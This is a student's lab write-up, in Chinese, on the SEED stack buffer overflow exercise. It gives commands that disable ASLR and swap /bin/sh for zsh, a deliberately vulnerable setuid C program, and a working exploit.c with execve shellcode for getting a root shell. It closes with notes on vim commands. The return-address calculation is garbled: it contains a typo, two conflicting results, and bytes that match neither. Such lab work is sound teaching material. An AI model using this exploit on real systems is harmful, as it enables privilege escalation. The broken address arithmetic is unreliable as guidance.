实验原理
缓冲区溢出是指程序向一个已分配内存的固定长度缓冲区写数据,使得数据超出了缓冲区的边界。用心不良的用户就可以利用这个漏洞改变程序执行的方向,甚至可以执行一段恶意的代码。本质上说,漏洞的根源是计算机的内存中,数据和指令(例如函数的返回地址)是一起存储的,这样数据部分的溢出可能会影响到程序指令部分的执行,例如函数的返回地址指令就有可能会被改写。
本次实验提供一个具有缓冲区漏洞的程序,我们的任务是利用这个漏洞获取root权限。
实验内容
环境配置
第一步
在UbuntuSEED系统中,目前都使用内存地址随机化的机制来初始化堆栈,这将会使得猜测具体的内存地址变得十分困难,所以在本试验中,用下列命令关闭内存随机化机制:
$ su root
Password: (enter root password)
#sysctl -w kernel.randomize_va_space=0
第二步
此外,为了进一步防范缓冲区溢出攻击及其它利用shell程序的攻击,许多shell程序在被调用时自动放弃它们的特权。因此,即使你能欺骗一个Set-UID程序调用一个shell,也不能在这个shell中保持root权限,这个防护措施在/bin/bash中实现。
linux系统中,/bin/sh实际是指向/bin/bash或/bin/dash的一个符号链接。为了重现这一防护措施被实现之前的情形,我们使用另一个shell程序(zsh)代替/bin/bash。下面的指令描述了如何设置zsh程序:
sudo su
cd /bin
rm sh
ln -s /bin/zsh /bin/sh
exit
shellcode
一般情况下,缓冲区溢出会造成程序崩溃,在程序中,溢出的数据覆盖了返回地址。而如果覆盖返回地址的数据是另一个地址,那么程序就会跳转到该地址,如果该地址存放的是一段精心设计的代码用于实现其他功能,这段代码就是shellcode。在开始攻击之前,我们需要一段shellcode,shellcode是一段启动shell命令的代码。这段代码被放置在内存中,我们让具有缓冲区漏洞的程序跳到这段代码上去执行它。
漏洞程序
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
编译漏洞程序命令:
$ su root
password (enter root password)
# gcc -o stack -fno-stack-protector stack.c
# chmod 4755 stack
# exit
攻击程序
我们的目的是攻击刚才的漏洞程序,并通过攻击获得root权限。
把以下代码保存为“exploit.c”文件,保存到 /tmp 目录下。代码如下:
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" //xorl %eax,%eax
"\x50" //pushl %eax
"\x68""//sh" //pushl $0x68732f2f
"\x68""/bin" //pushl $0x6e69622f
"\x89\xe3" //movl %esp,%ebx
"\x50" //pushl %eax
"\x53" //pushl %ebx
"\x89\xe1" //movl %esp,%ecx
"\x99" //cdq
"\xb0\x0b" //movb $0x0b,%al
"\xcd\x80" //int $0x80
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");
strcpy(buffer+100,shellcode);
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
注意上面的代码,“\x??\x??\x??\x??”处需要添上shellcode保存在内存中的地址,因为发生溢出后这个位置刚好可以覆盖返回地址。
而 strcpy(buffer+100,shellcode); 这一句又告诉我们,shellcode保存在 buffer+100 的位置。
现在我们要得到shellcode在内存中的地址,输入命令:
gdb stack
disass main
结果如图:
接下来的操作:
根据语句 strcpy(buffer+100,shellcode); 我们计算shellcode的地址为 0xbffff2fo(十六进制)+100(十进制)=0xbffff354(十六进制)
现在修改exploit.c文件!将\x??\x??\x??\x??
修改为 \x54\xf3\xff\xff
然后,编译exploit.c程序:(十六进制)+100(十进制)=0xfffff354(十六进制)
gcc -m32 -o exploit exploit.c
攻击结果
先运行攻击程序exploit
,再运行漏洞程序stack
,观察结果:
困难及解决
使用vim进行命令行编辑的时候,输入:wq
无法退出,一直提示错误,无法退出,是因为着急忘了先按下 ESC
退出编辑模式在进行输入。但是使用了另外的方法解决的,输入 :w newfile
把当前文件的内容保存到指定的newfile中,而原有文件保持不变。
然后仔细学习了几个vim退出命令。
- 在命令模式中,连按两次大写字母Z,若当前编辑的文件曾被修改过,则Vi保存该文件后退出,返回到shell;若当前编辑的文件没被修改过,则Vi直接退出, 返回到shell。
- 在末行模式下,输入命令
:w
Vi保存当前编辑文件,但并不退出,而是继续等待用户输入命令。在使用w命令时,可以再给编辑文件起一个新的文件名。
-
:w newfile
此时Vi将把当前文件的内容保存到指定的newfile中,而原有文件保持不变。若newfile是一个已存在的文件,则Vi在显示窗口的状态行给出提示信息:
File exists (use ! to override)
此时,若用户真的希望用文件的当前内容替换newfile中原有内容,可使用命令
:w! newfile
否则可选择另外的文件名来保存当前文件。
- 在末行模式下,输入命令
:q
系统退出Vi返回到shell。若在用此命令退出Vi时,编辑文件没有被保存,则Vi在显示窗口的最末行显示如下信息:
No write since last change (use ! to overrides)
提示用户该文件被修改后没有保存,然后Vi并不退出,继续等待用户命令。若用户就是不想保存被修改后的文件而要强行退出Vi时,可使用命令
:q!
Vi放弃所作修改而直接退到shell下,并不保存已经编辑的文件。
- 在末行模式下,输入命令
:wq
Vi将先保存文件,然后退出Vi返回到shell。
* 在末行模式下,输入命令
:x
该命令的功能同命令模式下的ZZ命令功能相同。
- 学习还是要扎扎实实切不可粗心大意,小细节不可忽视。